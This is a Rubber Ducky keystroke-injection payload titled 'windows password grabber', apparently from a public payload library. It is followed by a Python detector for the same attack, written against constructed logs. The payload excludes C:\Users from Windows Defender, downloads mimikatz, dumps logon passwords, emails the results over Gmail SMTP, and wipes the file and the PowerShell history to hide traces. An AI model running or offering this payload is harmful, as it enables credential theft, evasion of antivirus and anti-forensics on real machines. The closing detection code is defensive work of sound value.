Path: blob/master/payloads/library/credentials/Simple_User_Password_Grabber/payload.txt
REM Title: windows password grabber
REM Author makozort, https://github.com/makozort
REM Target: windows 10 (with admin access), might work with windows 7 idk
REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NOT LIABLE FOR ANY MISUSE OF THIS SCRIPT
REM --------------set default delay based on the target computer's speed, 350 is around mid range (I think)
DEFAULT_DELAY 350
REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"
DELAY 1000
REM ------------open powershell as admin and set an exclusion path in the C:\Users path
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 600
ALT y
STRING Set-MpPreference -ExclusionPath C:\Users
ENTER
STRING exit
ENTER
REM -------------download mimikatz
GUI r
STRING cmd
CTRL-SHIFT ENTER
DELAY 600
ALT y
STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
ENTER
REM ------------run the following mimikatz commands and print results in new txt file
DELAY 4000
STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
ENTER
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
STRING exit
ENTER
REM --------- delete mimikatz
STRING del %TEMP%\pw.exe
ENTER
STRING exit
ENTER
REM -------------email the pwlog.txt to your email
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 600
ALT y
STRING Remove-MpPreference -ExclusionPath C:\Users
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
SHIFT 2
STRING gmail.com', 'PASSWORDHERE');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
SHIFT 2
STRING gmail.com'
ENTER
STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
SHIFT 2
STRING gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Hello from the ducky'
ENTER
STRING $ReportEmail.Body = 'Attached is your duck report.'
ENTER
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 4000
STRING exit
ENTER
REM ------cleanup time
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 600
ALT y
REM ----------delete the txt file
STRING del c:\pwlog.txt
ENTER
REM -------remove powershell history (this probably won't be enough to remove all traces of you, this is just to prevent initial investigations)
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
STRING exit
ENTER
REM ------lock the pc
GUI l
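From the defender's side, what makes this payload stand out is the sequence it types within about a minute on one host: a Defender exclusion via Set-MpPreference, a WebClient download into %temp%, SMTP exfiltration of the log file, and a PSReadLine history wipe. The following Python is an added example, not part of the payload repository, that correlates those stages per host over PowerShell script block logging (Event 4104) lines; the log line format, host names and URL are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of script block log lines (not real telemetry).
# Assumed flat format: "<ISO timestamp> <host> <event id> <script text>".
SAMPLE_LOG = r"""
2024-01-01T10:00:01 WS01 4104 Set-MpPreference -ExclusionPath C:\Users
2024-01-01T10:00:09 WS01 4104 (new-object System.Net.WebClient).DownloadFile('http://example.invalid/pw.exe','C:\Users\jdoe\AppData\Local\Temp\pw.exe')
2024-01-01T10:00:40 WS01 4104 Remove-MpPreference -ExclusionPath C:\Users
2024-01-01T10:00:41 WS01 4104 $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
2024-01-01T10:00:44 WS01 4104 $ReportEmail.Attachments.Add('c:\pwlog.txt')
2024-01-01T10:00:50 WS01 4104 Remove-Item (Get-PSReadlineOption).HistorySavePath
2024-01-01T11:30:00 WS02 4104 Get-ChildItem C:\Users
""".strip()

# One regex per stage of the payload; a stage counts once per host however often it fires.
STAGES = {
    "defender_exclusion": re.compile(r"(Set|Add|Remove)-MpPreference\s+-ExclusionPath", re.I),
    "webclient_download": re.compile(r"WebClient\)\.DownloadFile\(.*?(\\Temp\\|%temp%)", re.I),
    "smtp_exfil": re.compile(r"Net\.Mail\.SmtpClient|\.Attachments\.Add\(", re.I),
    "history_wipe": re.compile(r"Remove-Item\s*\(Get-PSReadlineOption\)\.HistorySavePath", re.I),
}


def parse_events(log_text):
    """Yield (timestamp, host, script) tuples from the assumed flat log format."""
    for line in log_text.splitlines():
        ts, host, _event_id, script = line.split(" ", 3)
        yield datetime.fromisoformat(ts), host, script


def detect_payload_chain(log_text, window=timedelta(minutes=5), min_stages=3):
    """Return {host: sorted stage names} for every host on which at least
    min_stages distinct stages occur within `window` of each other.
    A lone exclusion change or a lone SMTP send does not alert on its own."""
    hits = {}  # host -> [(timestamp, stage name), ...]
    for ts, host, script in parse_events(log_text):
        for name, rx in STAGES.items():
            if rx.search(script):
                hits.setdefault(host, []).append((ts, name))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):  # slide the window from each hit
            stages = {name for ts, name in seq[i:] if ts - start <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts
```

Running `detect_payload_chain(SAMPLE_LOG)` flags only WS01 with all four stages; the single benign Get-ChildItem on WS02 produces nothing.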